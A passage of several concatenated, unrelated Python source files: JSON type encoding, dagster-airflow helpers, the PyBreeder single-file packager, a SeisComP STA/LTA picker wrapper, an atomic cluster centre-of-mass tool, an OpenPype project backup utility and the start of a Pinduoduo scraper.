return o.__dict__
elif o.__class__.__name__ == 'DataFrame':
return 'dataframe:'+o.to_json()
elif isinstance(o, datetime.datetime):
r = o.isoformat()
if o.microsecond:
r = r[:23] + r[26:]
if r.endswith("+00:00"):
r = r[:-6] + "Z"
return 'datetime:'+r
elif isinstance(o, datetime.date):
return 'date:'+o.isoformat()
elif isinstance(o, datetime.time):
r = o.isoformat()
if o.microsecond:
r = r[:12]
return 'time:'+r
elif isinstance(o, decimal.Decimal):
return 'decimal:'+str(o)
elif isinstance(o, uuid.UUID):
return 'uuid:'+str(o)
elif isinstance(o, bytes):
return 'bytes:'+base64.b64encode(o).decode("UTF-8")
else:
return super().default(o)
# It's a JSON decoder that looks for a colon in the value of a key/value pair. If it finds one, it
# assumes the value is a string that represents a type and a value. It then converts the value to the
# appropriate type
class IrisJSONDecoder(json.JSONDecoder):
def __init__(self, *args, **kwargs):
json.JSONDecoder.__init__(
self, object_hook=self.object_hook, *args, **kwargs)
def object_hook(self, obj):
ret = {}
for key, value in obj.items():
i = 0
if isinstance(value, str):
i = value.find(":")
if (i>0):
typ = value[:i]
if typ in {'datetime', 'time','date'}:
ret[key] = datetime.datetime.fromisoformat(value[i+1:])
elif typ == 'dataframe':
module = importlib.import_module('pandas')
pd = getattr(module, 'DataFrame')
ret[key] = pd(value[i+1:])
elif typ == 'decimal':
ret[key] = decimal.Decimal(value[i+1:])
elif typ == 'uuid':
ret[key] = uuid.UUID(value[i+1:])
elif typ == 'bytes':
ret[key] = base64.b64decode((value[i+1:].encode("UTF-8")))
else:
ret[key] = value
else:
ret[key] = value
return ret
|
<gh_stars>0
import os
import dateutil.parser
from airflow.exceptions import AirflowException, AirflowSkipException
from dagster import DagsterEventType, check
from dagster.core.events import DagsterEvent
from dagster.core.execution.api import create_execution_plan, execute_plan
from dagster.core.execution.plan.plan import can_isolate_steps, should_skip_step
from dagster.core.instance import AIRFLOW_EXECUTION_DATE_STR, DagsterInstance
def check_events_for_failures(events):
check.list_param(events, "events", of_type=DagsterEvent)
for event in events:
if event.event_type_value == "STEP_FAILURE":
raise AirflowException(
"step failed with error: %s" % event.event_specific_data.error.to_string()
)
# Using AirflowSkipException is a canonical way for tasks to skip themselves; see example
# here: http://bit.ly/2YtigEm
def check_events_for_skips(events):
check.list_param(events, "events", of_type=DagsterEvent)
skipped = any([e.event_type_value == DagsterEventType.STEP_SKIPPED.value for e in events])
if skipped:
raise AirflowSkipException("Dagster emitted skip event, skipping execution in Airflow")
def convert_airflow_datestr_to_epoch_ts(airflow_ts):
"""convert_airflow_datestr_to_epoch_ts
Converts Airflow time strings (e.g. 2019-06-26T17:19:09+00:00) to epoch timestamps.
"""
dt = dateutil.parser.parse(airflow_ts)
return (dt - dateutil.parser.parse("1970-01-01T00:00:00+00:00")).total_seconds()
def get_aws_environment():
"""
Return AWS environment variables for Docker and Kubernetes execution.
"""
default_env = {}
# Note that if these env vars are set in Kubernetes, anyone with access to pods in that
# namespace can retrieve them. This may not be appropriate for all environments.
# Also, if these env vars are set as blank vars, the behavior depends on boto version:
# https://github.com/boto/botocore/pull/1687
# It's safer to check-and-set since if interpreted as blank strings they'll break the
# cred retrieval chain (such as on-disk or metadata-API creds).
aws_access_key_id = os.getenv("AWS_ACCESS_KEY_ID")
aws_secret_access_key = os.getenv("AWS_SECRET_ACCESS_KEY")
# The creds _also_ break if you only set one of them.
if aws_access_key_id and aws_secret_access_key:
# TODO: also get region env var this way, since boto commands may fail without it
default_env.update(
{"AWS_ACCESS_KEY_ID": aws_access_key_id, "AWS_SECRET_ACCESS_KEY": aws_secret_access_key}
)
elif aws_access_key_id or aws_secret_access_key:
raise ValueError(
"If `propagate_aws_vars=True`, must provide either both of AWS_ACCESS_KEY_ID "
"and AWS_SECRET_ACCESS_KEY env vars, or neither."
)
return default_env
def check_storage_specified(pipeline_def, mode_def):
if not can_isolate_steps(pipeline_def, mode_def):
raise AirflowException(
"DAGs created using dagster-airflow run each step in its own process, but your "
"pipeline includes solid outputs that will not be stored somewhere where other "
"processes can retrieve them. Please use a persistent IO manager for these "
"outputs. E.g. with\n"
' @pipeline(mode_defs=[ModeDefinition(resource_defs={"io_manager": fs_io_manager})])'
)
return
def invoke_steps_within_python_operator(
invocation_args, ts, dag_run, **kwargs
): # pylint: disable=unused-argument
mode = invocation_args.mode
pipeline_name = invocation_args.pipeline_name
step_keys = invocation_args.step_keys
instance_ref = invocation_args.instance_ref
run_config = invocation_args.run_config
recon_repo = invocation_args.recon_repo
pipeline_snapshot = invocation_args.pipeline_snapshot
execution_plan_snapshot = invocation_args.execution_plan_snapshot
parent_pipeline_snapshot = invocation_args.parent_pipeline_snapshot
run_id = dag_run.run_id
instance = DagsterInstance.from_ref(instance_ref) if instance_ref else None
if instance:
with instance:
tags = {AIRFLOW_EXECUTION_DATE_STR: ts} if ts else {}
pipeline_run = instance.register_managed_run(
pipeline_name=pipeline_name,
run_id=run_id,
run_config=run_config,
mode=mode,
solids_to_execute=None,
step_keys_to_execute=None,
tags=tags,
root_run_id=None,
parent_run_id=None,
pipeline_snapshot=pipeline_snapshot,
execution_plan_snapshot=execution_plan_snapshot,
parent_pipeline_snapshot=parent_pipeline_snapshot,
)
recon_pipeline = recon_repo.get_reconstructable_pipeline(
pipeline_name
).subset_for_execution_from_existing_pipeline(pipeline_run.solids_to_execute)
execution_plan = create_execution_plan(
recon_pipeline,
run_config=run_config,
step_keys_to_execute=step_keys,
mode=mode,
)
if should_skip_step(execution_plan, instance, pipeline_run.run_id):
raise AirflowSkipException(
"Dagster emitted skip event, skipping execution in Airflow"
)
events = execute_plan(
execution_plan, recon_pipeline, instance, pipeline_run, run_config=run_config
)
check_events_for_failures(events)
check_events_for_skips(events)
return events
def airflow_tags_for_ts(ts):
"""Converts an Airflow timestamp string to a list of tags."""
check.opt_str_param(ts, "ts")
return [
{"key": AIRFLOW_EXECUTION_DATE_STR, "value": ts},
]
|
#!/usr/bin/python
#
# This is a poor-man's executable builder, for embedding dependencies into
# our pagekite.py file until we have proper packaging.
#
import base64, os, sys, zlib
BREEDER_NOTE = """\
#
# WARNING: This is a compilation of multiple Python files. Do not edit.
#
"""
BREEDER_PREAMBLE = """\
#!/usr/bin/python
#
%s
#
##[ Combined with Breeder: http://pagekite.net/wiki/Floss/PyBreeder/ ]#########
import base64, imp, os, sys, StringIO, zlib
__FILES = {}
__os_path_exists = os.path.exists
__os_path_getsize = os.path.getsize
__builtin_open = open
def __comb_open(filename, *args, **kwargs):
if filename in __FILES:
return StringIO.StringIO(__FILES[filename])
else:
return __builtin_open(filename, *args, **kwargs)
def __comb_exists(filename, *args, **kwargs):
if filename in __FILES:
return True
else:
return __os_path_exists(filename, *args, **kwargs)
def __comb_getsize(filename, *args, **kwargs):
if filename in __FILES:
return len(__FILES[filename])
else:
return __os_path_getsize(filename, *args, **kwargs)
if 'b64decode' in dir(base64):
__b64d = base64.b64decode
else:
__b64d = base64.decodestring
open = __comb_open
os.path.exists = __comb_exists
os.path.getsize = __comb_getsize
sys.path[0:0] = ['.SELF/']
"""
BREEDER_GTK_PREAMBLE = """\
try:
import gobject, gtk
def gtk_open_image(filename):
return __FILES[filename.replace('\\\\', '/')+':GTK']
except ImportError:
gtk_open_image = None
"""
BREEDER_POSTAMBLE = """\
#EOF#
"""
BREEDER_DIVIDER = '#' * 79
def br79(data):
lines = []
while len(data) > 0:
lines.append(data[0:79])
data = data[79:]
return lines
def format_snake(fn, raw=False, compress=False, binary=False):
fd = open(fn, 'rb')
if raw:
pre, post = '"""\\', '"""'
lines = [l.replace('\n', '')
.replace('\r', '')
for l in fd.readlines()]
elif compress:
pre, post = 'zlib.decompress(__b64d("""\\', '"""))'
lines = br79(base64.b64encode(zlib.compress(''.join(fd.readlines()), 9)))
elif binary:
pre, post = '__b64d("""\\', '""")'
lines = br79(base64.b64encode(''.join(fd.readlines())))
else:
pre, post = '"""\\', '"""'
lines = [l.replace('\n', '')
.replace('\r', '')
.replace('\\', '\\\\')
.replace('"', '\\"')
for l in fd.readlines()]
fd.close()
return pre, lines, post
def breed_python(fn, main, compress=False, gtk_images=False):
pre, lines, post = format_snake(fn, raw=main, compress=compress)
if main: return '\n'.join(lines)
path = os.path.dirname(fn)
if fn.endswith('/__init__.py'):
bn = os.path.basename(path)
path = path[:-(len(bn)+1)]
else:
bn = os.path.basename(fn).replace('.py', '')
while path and os.path.exists(os.path.join(path, '__init__.py')):
pbn = os.path.basename(path)
bn = '%s.%s' % (pbn, bn)
path = path[:-(len(pbn)+1)]
text = ['__FILES[".SELF/%s"] = %s' % (fn, pre)]
text.extend(lines)
text.extend([
post,
'sys.modules["%s"] = imp.new_module("%s")' % (bn, bn),
'sys.modules["%s"].open = __comb_open' % (bn, ),
])
if gtk_images:
text.append('sys.modules["%s"].gtk_open_image = gtk_open_image' % (bn, ))
if '.' in bn:
parts = bn.split('.')
text.append(('sys.modules["%s"].%s = sys.modules["%s"]'
) % ('.'.join(parts[:-1]), parts[-1], bn))
text.extend([
'exec __FILES[".SELF/%s"] in sys.modules["%s"].__dict__' % (fn, bn),
''
])
return '\n'.join(text)
def breed_text(fn, compress=False):
pre, lines, post = format_snake(fn, compress=compress)
text = ['__FILES[".SELF/%s"] = %s' % (fn, pre)]
text.extend(lines)
text.append(post)
return '\n'.join(text)
def breed_binary(fn, compress=False):
pre, lines, post = format_snake(fn, compress=compress, binary=True)
text = ['__FILES[".SELF/%s"] = %s' % (fn, pre)]
text.extend(lines)
text.append('%s\n' % post)
return '\n'.join(text)
def breed_gtk_image(fn):
img = gtk.Image()
img.set_from_file(fn)
pb = img.get_pixbuf()
lines = br79(base64.b64encode(zlib.compress(pb.get_pixels(), 9)))
data = '\n'.join(lines)
text = [breed_binary(fn).strip(),
('__FILES[".SELF/%s:GTK"] = gtk.gdk.pixbuf_new_from_data(\n %s)'
) % (fn, ', '.join([str(p) for p in [
'zlib.decompress(__b64d("""\\\n%s"""\n ))' % data,
'\n gtk.gdk.COLORSPACE_RGB',
pb.get_has_alpha(),
pb.get_bits_per_sample(),
pb.get_width(),
pb.get_height(),
pb.get_rowstride()
]])), '']
return '\n'.join(text)
def breed_dir(dn, main, smart=True, gtk_images=False, compress=False):
files = [f for f in os.listdir(dn) if not f.startswith('.')]
text = []
# Make sure __init__.py is FIRST.
if '__init__.py' in files:
files.remove('__init__.py')
files[0:0] = ['__init__.py']
# Make sure __main__.py is either excluded, or LAST
if '__main__.py' in files:
files.remove('__main__.py')
if main: files.append('__main__.py')
for fn in files:
ismain = (main and fn == files[-1])
fn = os.path.join(dn, fn)
bred = breed(fn, ismain,
smart=True, gtk_images=gtk_images, compress=compress)
if bred: text.append(bred)
return ('\n%s\n' % BREEDER_DIVIDER).join(text)
EXCL = ('pyc', 'tmp', 'bak')
def breed(fn, main, smart=True, gtk_images=False, compress=False):
if '"' in fn or '\\' in fn:
raise ValueError('Cannot handle " or \\ in filenames')
if os.path.isdir(fn):
return breed_dir(fn, main,
smart=smart, gtk_images=gtk_images, compress=compress)
extension = fn.split('.')[-1].lower()
if smart and extension in EXCL: return ''
if extension in ('py', 'pyw'):
return breed_python(fn, main, gtk_images=gtk_images, compress=compress)
if extension in ('txt', 'md', 'html', 'css', 'js', 'pk-shtml'):
return breed_text(fn, compress=compress)
if gtk_images and extension in ('gif', 'png', 'jpg', 'jpeg'):
return breed_gtk_image(fn)
return breed_binary(fn, compress=compress)
if __name__ == '__main__':
gtk_images = compress = False
header = BREEDER_NOTE
args = sys.argv[1:]
if '--gtk-images' in args:
import gobject, gtk
gtk_images = True
args.remove('--gtk-images')
if '--compress' in args:
compress=True
args.remove('--compress')
if '--header' in args:
header = ''.join(open(args.pop(args.index('--header')+1), 'r').readlines())
args.remove('--header')
print BREEDER_PREAMBLE % header.strip()
if gtk_images:
print BREEDER_GTK_PREAMBLE
for fn in args:
print BREEDER_DIVIDER
print breed(fn, (fn == args[-1]), gtk_images=gtk_images, compress=compress)
print
print BREEDER_POSTAMBLE
|
# -*- coding: utf-8 -*-
"""
Classes and functions to compute sta/lta in seiscomp3
Created on Jul 20 2021
@author: <NAME>, <EMAIL>
"""
#from obspy import read, UTCDateTime
import obspy
import os
import xml.etree.ElementTree as ET
import pandas as pd
from obspy.core import UTCDateTime
import numpy as np
from concurrent.futures import ProcessPoolExecutor
from icecream import ic
ic.configureOutput(prefix='debug| ') # , includeContext=True)
class StaLta:
times_file: str
picks_dir: str
inv_xml: str
_debug: bool
best_p_csv = 'results_P.csv'
main_dir: str = os.path.dirname(os.path.realpath(__file__))
def __init__(self):
self.__dict__.update(self._current_exc_params)
@property
def best_p_params(self):
"""
Get the best p parameters
"""
df = pd.read_csv(self.best_p_csv)
# selecting the row with net.sta equal to CM.BAR2 and with the highest value of best_f1
p_best = df[df['net.sta'] == f'{self.net}.{self.sta}'].sort_values(by='best_f1', ascending=False).iloc[0].to_dict()
return p_best
@property
def _current_exc_params(self):
"""function that reads from a file called current_exc.txt
the values of times_paths['P'] or times_paths['S'], picks_dir, inv_xml, and debug
"""
f = open('current_exc.txt', 'r')
lines = f.readlines()
f.close()
dic = {}
for line in lines:
line = line.strip('\n').strip(' ')
key, value = line.split('=')
dic[key.strip()] = value.strip()
return dic
@property
def debug(self):
return True if self._debug in ['true', 'True', 'TRUE'] else False
@property
def times_file_name(self):
return os.path.basename(self.times_file)
@property
def station_name(self):
return self.times_file_name.split('_')[0]
@property
def phase(self):
return ic(self.times_file_name.split('_')[-2])
@property
def lines(self):
return open(self.times_file, 'r').readlines()
@property
def N(self):
return len(self.lines)
@property
def max_workers(self):
"""
Get the maximum number of workers if debug is false
"""
if self.debug:
return 1
else:
return int(os.cpu_count() * 1)
def mega_sta_lta(self, **kwargs):
"""
Compute sta/lta for all lines in the file
"""
kwargs.update(self._current_exc_params)
self.remove_picks_dir()
self.edit_xml_config(**kwargs)
Y_obs_ = []
Y_pred_ = []
"""for line in self.lines:
self.exc_read_transform(line)
Y_obs_.append(self.y_obs)
Y_pred_.append(self.y_pred)
Y_obs = np.concatenate(Y_obs_)
Y_pred = np.concatenate(Y_pred_)"""
# self.max_workers
# execute scautopick in parallel and saving the results in Y_obs and Y_pred
with ProcessPoolExecutor(max_workers=self.max_workers) as excecutor:
for y_obs, y_pred in excecutor.map(self.exc_read_transform, self.lines):
Y_obs_.append(y_obs)
Y_pred_.append(y_pred)
Y_obs = np.concatenate(Y_obs_)
Y_pred = np.concatenate(Y_pred_)
ic(Y_obs)
ic(Y_pred)
ic(np.unique(Y_obs))
ic(np.unique(Y_pred))
# plot if debug is true
if self.debug:
self.test_binary_times(Y_obs, Y_pred)
return Y_obs, Y_pred
def exc_read_transform(self, line):
self.sta_lta_compute(line)
try:
# get pick times
self.pick_times = XMLPicks(self.pick_path, self.phase).get_pick_times()
except TypeError:
ic()
# if no pick is found, set pick times to empty list
self.pick_times = []
except KeyError:
ic()
self.pick_times = []
# transform predicted times into a binary time series
y_pred = BinaryTransform(self.wf_start_time,
self.sample_rate,
self.npts,
self.pick_times).transform()
y_obs = BinaryTransform(self.wf_start_time,
self.sample_rate,
self.npts,
self.ph_time).transform()
if self.debug:
self.test_binary_time(y_pred)
return y_obs, y_pred
def time2sample(self, time: UTCDateTime):
"""
Convert a time into a sample
"""
return int((time - self.wf_start_time) * self.sample_rate)
def test_binary_times(self, y_obs, y_pred):
import matplotlib.pyplot as plt
plt.figure()
plt.plot(y_obs, label='Y_obs')
plt.plot(y_pred, "--r", label='Y_pred')
plt.legend()
plt.show()
def test_binary_time(self, y_pred):
import obspy as obs
import matplotlib.pyplot as plt
st = obs.read(self.wf_path)
tr = st[0]
# getting the pick times in counts of samples
tc = [self.time2sample(t) for t in self.pick_times]
plt.figure(figsize=(8, 4))
plt.subplot(211)
plt.plot(tr.data, color='k', lineWidth=0.5)
plt.vlines(tc, -5000, 5000, color='r', zorder=10)
plt.legend(['waveform', 'predicted picks'])
plt.title(f'{self.station_name} {self.phase}')
plt.xticks([])
plt.ylabel('Amplitude')
plt.subplot(212)
plt.plot(y_pred)
plt.show()
def remove_picks_dir(self):
"""
Remove the picks directory content if it exists
"""
if os.path.exists(self.picks_dir):
os.system(f'rm {self.picks_dir}/*')
def sta_lta_compute(self, line: str):
"""
Compute sta/lta for a single line
"""
fields = line.split(',')
self.ph_time = [obspy.UTCDateTime(fields[1].strip("\n\r"))]
# get the initial waveform time
self.wf_start_time = obspy.UTCDateTime(fields[2].strip("\n\r"))
# get the sample rate
self.sample_rate = float(fields[3].strip("\n\r"))
# get the number of samples
self.npts = int(fields[4].strip("\n\r"))
self.wf_path = fields[0]
self.run_scautopick()
@property
def xml_exc_name(self):
return f'exc_{self.station_name}_{self.phase}.xml'
def edit_xml_config(self, **kwargs):
"""
Edit the config.xml file
"""
if self.phase == 'P':
xml_filename = 'config_template_P.xml'
kwargs['p_fmax'] = kwargs['p_fmin'] + kwargs['p_fwidth']
kwargs['p_lta'] = kwargs['p_sta'] + kwargs['p_sta_width']
kwargs['aic_fmax'] = kwargs['aic_fmin'] + kwargs['aic_fwidth']
else:
xml_filename = 'config_template.xml'
kwargs['p_fmax'] = kwargs['p_fmin'] + kwargs['p_fwidth']
kwargs['p_lta'] = kwargs['p_sta'] + kwargs['p_sta_width']
kwargs['aic_fmax'] = kwargs['aic_fmin'] + kwargs['aic_fwidth']
kwargs['s_fmax'] = kwargs['s_fmin'] + kwargs['s_fwidth']
ic(xml_filename)
# xml path for the template
xml_path = os.path.join(self.main_dir, 'bindings', xml_filename)
xml_str = open(xml_path, 'r').read()
# xml path for the excecution of scautopick
self.xml_exc_path = os.path.join(os.getcwd(), self.xml_exc_name)
# Edit the config.xml file
with open(self.xml_exc_path, 'w') as f:
f.write(ic(xml_str.format(**kwargs)))
def run_scautopick(self):
"""
Run scautopick
"""
debug_line = ' --debug' if self.debug else ''
# Run scautopick
cmd = f'scautopick -I {self.wf_path} --config-db {self.xml_exc_path}'
cmd += f' --amplitudes 0 --inventory-db {self.inv_xml}'
cmd += f' --playback --ep{debug_line}>{self.pick_path}'
ic(cmd)
os.system(cmd)
@property
def picks_name(self):
"""
Return the name of the pick file
"""
return os.path.basename(self.wf_path).split('.')[0] + '_picks.xml'
@property
def pick_path(self):
return os.path.join(self.picks_dir, self.picks_name)
class XMLPicks:
xml_path: str
ns: dict = {'seiscomp': 'http://geofon.gfz-potsdam.de/ns/seiscomp3-schema/0.11'}
def __init__(self, xml_path: str, phase: str):
self.xml_path = xml_path
self.phase = phase
def open_dict_time(self, x):
return x['value']
def get_pick_times(self):
"""
Return automatic pick times from an xml file
"""
times = []
root = ET.parse(self.xml_path).getroot()
for pick in root.findall('seiscomp:EventParameters/seiscomp:pick', self.ns):
if self.phase == pick.find('seiscomp:phaseHint', self.ns).text:
time = pick.find('seiscomp:time/seiscomp:value', self.ns).text
ic(time)
times.append(obspy.UTCDateTime(time))
return times
"""def get_pick_times(self):
ic(self.xml_path)
df = pdx.read_xml(self.xml_path,
['seiscomp', 'EventParameters', 'pick'])
df['time'] = pd.to_datetime(df['time'].apply(self.open_dict_time))
t = df['time'].dt.tz_localize(None).astype('str').to_list()
times = [UTCDateTime(i) for i in t]
return np.array(times)"""
class BinaryTransform:
"""
Transform pick times into a binary time series
"""
unc: float = 1.0
def __init__(self, wf_start_time: UTCDateTime, sample_rate: float,
npts: int, ph_times: list):
self.wf_start_time = wf_start_time
self.ph_times = ph_times
self.sample_rate = sample_rate
self.npts = npts
def transform(self):
"""
Transform pick times into a binary time series
"""
z = np.zeros(self.npts)
if len(self.ph_times) == 0:
return z
# transform pick times into a binary time series
for ph_time in self.ph_times:
# get the sample points for the phase time +/- uncertainty
n_ph_i, n_ph_f = self.phase_point(ph_time,
self.wf_start_time,
self.sample_rate,
self.unc)
# fill the time series with 1 between the sample points
z[n_ph_i:n_ph_f] = 1
return z
def phase_point(self, t, ti, df, unc):
"""Calcula los extremos de un intervalo de puntos del tiempo ingresado"""
t_r_p_i = t-ti-unc
t_r_p_f = t-ti+unc
n_p_i = int(t_r_p_i*df)
n_p_f = int(t_r_p_f*df)
return n_p_i, n_p_f
|
"""Locate the position of a cluster (its center of mass) in a simulation.
The module calculates the center of mass of a connected cluster of atoms,
even in the case where the cluster straddles the periodic boundaries. It
is OK that there are other atoms not connected to the cluster, as long
as the atom with the highest coordination number is part of the cluster,
or an atom being part of the cluster is specified manually.
"""
from asap3 import FullNeighborList
import numpy as np
import sys
from ase.io import PickleTrajectory, BundleTrajectory
class ClusterCenter:
def __init__(self, cutoff=3.0):
self.nblist = FullNeighborList(cutoff)
def calculate_center(self, atoms, startatom=None):
"""Calculate the center of mass position of a cluster of atoms.
An atom belonging to the cluster can optionally be specified, if
not specified one of the highest coordinated atoms is used.
"""
natoms = len(atoms)
self.nblist.check_and_update(atoms)
if startatom is None:
coordnum = [len(self.nblist[i]) for i in range(natoms)]
startatom = np.argmax(coordnum)
self.cluster = []
self.sumpos = np.zeros(3)
self.summass = 0
self.isincluster = np.zeros(natoms, bool)
self.masses = atoms.get_masses()
self.add_atom_to_cluster(startatom, atoms[startatom].position)
com = self.sumpos / self.summass
return com
def add_atom_to_cluster(self, n, pos):
"Add an atom and all its neighbors to the cluster."
self.isincluster[n] = True
self.sumpos += pos * self.masses[n]
self.summass += self.masses[n]
neighbors, reldists, sqdists = self.nblist.get_neighbors(n)
for i, relpos in zip(neighbors, reldists):
if not self.isincluster[i]:
# Add neighboring atom to cluster, using the relative
# position so periodic boundaries are handled correctly.
self.add_atom_to_cluster(i, pos + relpos)
def calculate_from_trajectory(self, traj, startatom=None, selector=None):
"""Calculate the center of mass for a cluster in a trajectory file.
traj: The trajectory object, or a file name.
startatom (optional): Specifies an atom guaranteed to be in the cluster.
If not specified, the atom with the highest coordination number is
used (if there is only one cluster this should work).
selector (optional): A function defining which atoms should be
considered. The function is called with one argument, the atoms
object, and should either return an array of booleans, one per
atom, indicating if they should be included, or return an array
of integers interpreted as the indices of the atoms to be included.
This can e.g. be used to select a cluster sitting on a substrate.
This method returns an array of center-of-mass positions, one for each
frame in the trajectory.
"""
if isinstance(traj, str):
if traj.endswith('.traj'):
traj = PickleTrajectory(traj)
elif traj.endswith('.bundle'):
traj = BundleTrajectory(traj)
else:
raise ValueError("Cannot handle a file name not ending in .traj or .bundle: " + traj)
result = []
for atoms in traj:
if selector is not None:
idx = selector(atoms)
atoms = atoms[idx]
result.append(self.calculate_center(atoms, startatom))
return result
if __name__ == '__main__':
# Demo example: Track a cluster of Ni atoms on a surface of something else.
def sel(a):
return np.equal(a.get_atomic_numbers(), 28)
res = ClusterCenter().calculate_from_trajectory(sys.argv[1], selector=sel)
print np.array(res)
|
<filename>openpype/lib/project_backpack.py
"""These lib functions are primarily for development purposes.
WARNING: This is not meant for production data.
Goal is to be able create package of current state of project with related
documents from mongo and files from disk to zip file and then be able recreate
the project based on the zip.
This gives ability to create project where a changes and tests can be done.
Keep in mind that to be able create a package of project has few requirements.
Possible requirement should be listed in 'pack_project' function.
"""
import os
import json
import platform
import tempfile
import shutil
import datetime
import zipfile
from bson.json_util import (
loads,
dumps,
CANONICAL_JSON_OPTIONS
)
from avalon.api import AvalonMongoDB
DOCUMENTS_FILE_NAME = "database"
METADATA_FILE_NAME = "metadata"
PROJECT_FILES_DIR = "project_files"
def add_timestamp(filepath):
"""Add timestamp string to a file."""
base, ext = os.path.splitext(filepath)
timestamp = datetime.datetime.now().strftime("%y%m%d_%H%M%S")
new_base = "{}_{}".format(base, timestamp)
return new_base + ext
def pack_project(project_name, destination_dir=None):
"""Make a package of a project with mongo documents and files.
This function has few restrictions:
- project must have only one root
- project must have all templates starting with
"{root[...]}/{project[name]}"
Args:
project_name(str): Project that should be packaged.
destination_dir(str): Optinal path where zip will be stored. Project's
root is used if not passed.
"""
print("Creating package of project \"{}\"".format(project_name))
# Validate existence of project
dbcon = AvalonMongoDB()
dbcon.Session["AVALON_PROJECT"] = project_name
project_doc = dbcon.find_one({"type": "project"})
if not project_doc:
raise ValueError("Project \"{}\" was not found in database".format(
project_name
))
roots = project_doc["config"]["roots"]
# Determine root directory of project
source_root = None
source_root_name = None
for root_name, root_value in roots.items():
if source_root is not None:
raise ValueError(
"Packaging is supported only for single root projects"
)
source_root = root_value
source_root_name = root_name
root_path = source_root[platform.system().lower()]
print("Using root \"{}\" with path \"{}\"".format(
source_root_name, root_path
))
project_source_path = os.path.join(root_path, project_name)
if not os.path.exists(project_source_path):
raise ValueError("Didn't find source of project files")
# Determine zip filepath where data will be stored
if not destination_dir:
destination_dir = root_path
destination_dir = os.path.normpath(destination_dir)
if not os.path.exists(destination_dir):
os.makedirs(destination_dir)
zip_path = os.path.join(destination_dir, project_name + ".zip")
print("Project will be packaged into \"{}\"".format(zip_path))
# Rename already existing zip
if os.path.exists(zip_path):
dst_filepath = add_timestamp(zip_path)
os.rename(zip_path, dst_filepath)
# We can add more data
metadata = {
"project_name": project_name,
"root": source_root,
"version": 1
}
# Create temp json file where metadata are stored
with tempfile.NamedTemporaryFile("w", suffix=".json", delete=False) as s:
temp_metadata_json = s.name
with open(temp_metadata_json, "w") as stream:
json.dump(metadata, stream)
# Create temp json file where database documents are stored
with tempfile.NamedTemporaryFile("w", suffix=".json", delete=False) as s:
temp_docs_json = s.name
# Query all project documents and store them to temp json
docs = list(dbcon.find({}))
data = dumps(
docs, json_options=CANONICAL_JSON_OPTIONS
)
with open(temp_docs_json, "w") as stream:
stream.write(data)
print("Packing files into zip")
# Write all to zip file
with zipfile.ZipFile(zip_path, "w", zipfile.ZIP_DEFLATED) as zip_stream:
# Add metadata file
zip_stream.write(temp_metadata_json, METADATA_FILE_NAME + ".json")
# Add database documents
zip_stream.write(temp_docs_json, DOCUMENTS_FILE_NAME + ".json")
# Add project files to zip
for root, _, filenames in os.walk(project_source_path):
for filename in filenames:
filepath = os.path.join(root, filename)
# TODO add one more folder
archive_name = os.path.join(
PROJECT_FILES_DIR,
os.path.relpath(filepath, root_path)
)
zip_stream.write(filepath, archive_name)
print("Cleaning up")
# Cleanup
os.remove(temp_docs_json)
os.remove(temp_metadata_json)
dbcon.uninstall()
print("*** Packing finished ***")
def unpack_project(path_to_zip, new_root=None):
"""Unpack project zip file to recreate project.
Args:
path_to_zip(str): Path to zip which was created using 'pack_project'
function.
new_root(str): Optional way how to set different root path for unpacked
project.
"""
print("Unpacking project from zip {}".format(path_to_zip))
if not os.path.exists(path_to_zip):
print("Zip file does not exists: {}".format(path_to_zip))
return
tmp_dir = tempfile.mkdtemp(prefix="unpack_")
print("Zip is extracted to temp: {}".format(tmp_dir))
with zipfile.ZipFile(path_to_zip, "r") as zip_stream:
zip_stream.extractall(tmp_dir)
metadata_json_path = os.path.join(tmp_dir, METADATA_FILE_NAME + ".json")
with open(metadata_json_path, "r") as stream:
metadata = json.load(stream)
docs_json_path = os.path.join(tmp_dir, DOCUMENTS_FILE_NAME + ".json")
with open(docs_json_path, "r") as stream:
content = stream.readlines()
docs = loads("".join(content))
low_platform = platform.system().lower()
project_name = metadata["project_name"]
source_root = metadata["root"]
root_path = source_root[low_platform]
# Drop existing collection
dbcon = AvalonMongoDB()
database = dbcon.database
if project_name in database.list_collection_names():
database.drop_collection(project_name)
print("Removed existing project collection")
print("Creating project documents ({})".format(len(docs)))
# Create new collection with loaded docs
collection = database[project_name]
collection.insert_many(docs)
# Skip change of root if is the same as the one stored in metadata
if (
new_root
and (os.path.normpath(new_root) == os.path.normpath(root_path))
):
new_root = None
if new_root:
print("Using different root path {}".format(new_root))
root_path = new_root
project_doc = collection.find_one({"type": "project"})
roots = project_doc["config"]["roots"]
key = tuple(roots.keys())[0]
update_key = "config.roots.{}.{}".format(key, low_platform)
collection.update_one(
{"_id": project_doc["_id"]},
{"$set": {
update_key: new_root
}}
)
# Make sure root path exists
if not os.path.exists(root_path):
os.makedirs(root_path)
src_project_files_dir = os.path.join(
tmp_dir, PROJECT_FILES_DIR, project_name
)
dst_project_files_dir = os.path.normpath(
os.path.join(root_path, project_name)
)
if os.path.exists(dst_project_files_dir):
new_path = add_timestamp(dst_project_files_dir)
print("Project folder already exists. Renamed \"{}\" -> \"{}\"".format(
dst_project_files_dir, new_path
))
os.rename(dst_project_files_dir, new_path)
print("Moving project files from temp \"{}\" -> \"{}\"".format(
src_project_files_dir, dst_project_files_dir
))
shutil.move(src_project_files_dir, dst_project_files_dir)
# CLeanup
print("Cleaning up")
shutil.rmtree(tmp_dir)
dbcon.uninstall()
print("*** Unpack finished ***")
|
<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import random
import requests
from bs4 import BeautifulSoup
import re
import json
import yaml
def get_domain():
return "http://mobile.yangkeduo.com/"
class PingDuoDuoGood:
def __init__(self, _good_name="", _good_number="", _good_price="", _good_link_url=""):
self.goods_name = _good_name
self.goods_price = _good_price
self.goods_number = _good_number
self.goods_link_url = _good_link_url
def to_string(self):
return self.goods_name + " " + str(self.goods_number) + "件 " + str(self.goods_price)
def parse(self, data):
if data is not None:
self.goods_name = get_not_none(data, "goods_name", "")
self.goods_number = get_not_none(data, "goods_number", 0)
self.goods_price = get_not_none(data, "goods_price", 0)
return self
def pares(data):
orders = data.get("orders")
for order in orders:
order_info = OrderInfo()
order_info.parse(order)
def get_not_none(data, key, default=""):
value = data.get(key)
return value if value is not None else default
def get_int_not_none(data, key, default = 0):
value = data.get(key)
return value if value is not None else default
def get_good_count(data):
try:
return data.split()[1]
except:
pass
return ""
def get_good_price(data):
first = data.split("\n")[0]
try:
price = (first.split())[2]
return str(float(price) / 100)
except:
pass
return ""
def get_good_info(data):
try:
return data.split()[0]
except:
pass
return ""
class MallInfo:
def __init__(self, _id = "", _mall_name = "", _mall_url = ""):
self.id = _id
self.mall_name = _mall_name
